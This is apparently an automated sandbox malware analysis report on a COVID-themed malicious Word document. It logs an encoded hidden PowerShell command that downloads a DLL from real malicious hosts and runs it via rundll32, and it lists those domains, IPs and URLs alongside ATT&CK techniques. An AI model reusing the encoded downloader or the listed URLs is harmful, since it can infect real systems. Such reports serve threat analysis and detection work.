ACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAE
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Masquerading21OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsCommand and Scripting Interpreter211Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsScripting22Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection111NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting22Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)File Deletion1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 338773 Sample: XP-9743 Medical report COVI... Startdate: 12/01/2021 Architecture: WINDOWS Score: 100 55 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->55 57 Multi AV Scanner detection for domain / URL 2->57 59 Antivirus detection for URL or domain 2->59 61 12 other signatures 2->61 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 23 2->17         started        process3 signatures4 75 Suspicious powershell command line found 14->75 77 Very long command line found 14->77 79 Encrypted powershell cmdline option found 14->79 19 powershell.exe 12 9 14->19         started        24 msg.exe 14->24         started        process5 dnsIp6 51 remediis.com 5.2.81.171, 443, 49165, 49166 ALASTYRTR Turkey 19->51 53 avadnansahin.com 109.232.216.177, 49167, 80 AEROTEK-ASTR Turkey 19->53 49 C:\Users\user\Kjl48kr49qm9ty9\S93E.dll, PE32 19->49 dropped 65 Powershell drops PE file 19->65 26 rundll32.exe 19->26         started        file7 signatures8 process9 process10 28 rundll32.exe 2 26->28         started        signatures11 73 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->73 31 rundll32.exe 1 28->31         started        process12 signatures13 83 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->83 34 rundll32.exe 1 31->34         started        process14 signatures15 63 Hides that the sample has been downloaded from the Internet (zone.identifier) 34->63 37 rundll32.exe 1 34->37         started        process16 signatures17 67 Hides that the sample has been downloaded from the Internet (zone.identifier) 37->67 40 rundll32.exe 1 37->40         started        process18 signatures19 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->69 43 rundll32.exe 1 40->43         started        process20 signatures21 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 43->71 46 rundll32.exe 1 43->46         started        process22 signatures23 81 Hides that the sample has been downloaded from the Internet (zone.identifier) 46->81

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
XP-9743 Medical report COVID-19.doc19%VirustotalBrowse
XP-9743 Medical report COVID-19.doc14%ReversingLabsScript-Macro.Trojan.Heuristic

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll100%Joe Sandbox ML

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
11.2.rundll32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
12.2.rundll32.exe.280000.1.unpack100%AviraHEUR/AGEN.1110387Download File
7.2.rundll32.exe.220000.1.unpack100%AviraHEUR/AGEN.1110387Download File
14.2.rundll32.exe.270000.1.unpack100%AviraHEUR/AGEN.1110387Download File
9.2.rundll32.exe.220000.1.unpack100%AviraHEUR/AGEN.1110387Download File
15.2.rundll32.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
10.2.rundll32.exe.1b0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
14.2.rundll32.exe.250000.0.unpack100%AviraHEUR/AGEN.1110387Download File
10.2.rundll32.exe.1d0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
15.2.rundll32.exe.1c0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
11.2.rundll32.exe.1e0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
8.2.rundll32.exe.1c0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
13.2.rundll32.exe.1f0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
9.2.rundll32.exe.200000.0.unpack100%AviraHEUR/AGEN.1110387Download File
8.2.rundll32.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
13.2.rundll32.exe.210000.1.unpack100%AviraHEUR/AGEN.1110387Download File

Domains

SourceDetectionScannerLabelLink
remediis.com2%VirustotalBrowse
avadnansahin.com2%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://avadnansahin.com2%VirustotalBrowse
http://avadnansahin.com0%Avira URL Cloudsafe
http://hellas-darmstadt.de/cgi-bin/ZSoo/6%VirustotalBrowse
http://hellas-darmstadt.de/cgi-bin/ZSoo/100%Avira URL Cloudmalware
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
https://remediis.comp0%Avira URL Cloudsafe
http://solicon.us/allam-cycle-1c4gn/f5z/6%VirustotalBrowse
http://solicon.us/allam-cycle-1c4gn/f5z/100%Avira URL Cloudmalware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://avadnansahin.com/wp-includes/w/0%Avira URL Cloudsafe
http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
https://remediis.com0%Avira URL Cloudsafe
http://www.riparazioni-radiotv.com/softaculous/DZz/0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
https://www.starlingtechs.com/GNM/0%Avira URL Cloudsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
http://69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
https://remediis.com/t/gm2X/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
remediis.com
5.2.81.171
truetrueunknown
avadnansahin.com
109.232.216.177
truetrueunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://avadnansahin.com/wp-includes/w/true
  • Avira URL Cloud: safe
unknown
http://69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/true
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpfalse
    high
    http://investor.msn.comrundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpfalse
      high
      http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpfalse
        high
        http://avadnansahin.compowershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmptrue
        • 2%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://hellas-darmstadt.de/cgi-bin/ZSoo/powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmptrue
        • 6%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://ocsp.sectigo.com0powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        https://remediis.comppowershell.exe, 00000005.00000002.2093497581.0000000003C5C000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://solicon.us/allam-cycle-1c4gn/f5z/powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmptrue
        • 6%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://www.litespeedtech.compowershell.exe, 00000005.00000002.2093517208.0000000003C6E000.00000004.00000001.sdmpfalse
          high
          http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpfalse
            high
            http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmpfalse
              high
              http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2088032725.0000000002380000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091689144.0000000002880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092831737.00000000027A0000.00000002.00000001.sdmpfalse
                high
                https://remediis.compowershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmptrue
                • Avira URL Cloud: safe
                unknown
                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmpfalse
                  high
                  http://www.riparazioni-radiotv.com/softaculous/DZz/powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://www.starlingtechs.com/GNM/powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://investor.msn.com/rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpfalse
                    high
                    https://sectigo.com/CPS0Dpowershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmpfalse
                      high
                      http://www.%s.comPApowershell.exe, 00000005.00000002.2088032725.0000000002380000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091689144.0000000002880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092831737.00000000027A0000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      low
                      https://remediis.com/t/gm2X/powershell.exe, 00000005.00000002.2096044095.000000001B606000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      69.49.88.46
                      unknownUnited States
                      33734MPW-MACHLINK-NETUStrue
                      109.232.216.177
                      unknownTurkey
                      42807AEROTEK-ASTRtrue
                      71.72.196.159
                      unknownUnited States
                      10796TWC-10796-MIDWESTUStrue
                      5.2.81.171
                      unknownTurkey
                      3188ALASTYRTRtrue

                      General Information

                      Joe Sandbox Version:31.0.0 Red Diamond
                      Analysis ID:338773
                      Start date:12.01.2021
                      Start time:20:30:12
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 7m 39s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:XP-9743 Medical report COVID-19.doc
                      Cookbook file name:defaultwindowsofficecookbook.jbs
